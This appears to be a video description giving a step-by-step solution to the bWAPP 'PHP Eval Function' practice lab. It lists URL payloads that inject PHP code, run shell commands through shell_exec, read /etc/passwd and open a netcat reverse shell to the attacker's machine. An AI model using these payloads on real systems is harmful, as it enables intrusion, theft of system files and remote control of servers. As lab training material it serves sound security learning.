bWAPP - PHP Eval Function

Опубликовано: 19 Апрель 2022
на канале: PseudoTime
1,945
14

PHP Eval Function - Low Security Level

Solution:

Step 1. As shown in the video, go through the source code.

Step 2. Let us test the eval parameter to see if it is indeed evaluating php code.
Modify url with payload: ?eval=echo "PseudoTime";
Check the output - The input what we have given is displayed.

Step 3. Let us run system commands using the shell_exec function
Modify url with payload: ?eval=echo shell_exec("id");
Check the output - We get back the id of the current user on the remote host.

Step 4. Let us try to get the passwords
Modify url with payload: ?eval=echo shell_exec("cat /etc/passwd");
Check the output - Contents of /etc/passwd are displayed

Step 5. Now, let us get a connect back shell to our local box.
Open Command Prompt - Give below commands
ifconfig
nc -lvp 4444
Modify url with payload: ?eval=echo shell_exec("nc -e /bin/sh 10.0.2.15 4444");
Change the ip to your local or beebox ip address.
** Note - I have tested this lesson on my local machine, you can test the same in your beebox. (Not covered in this video).

PseudoTime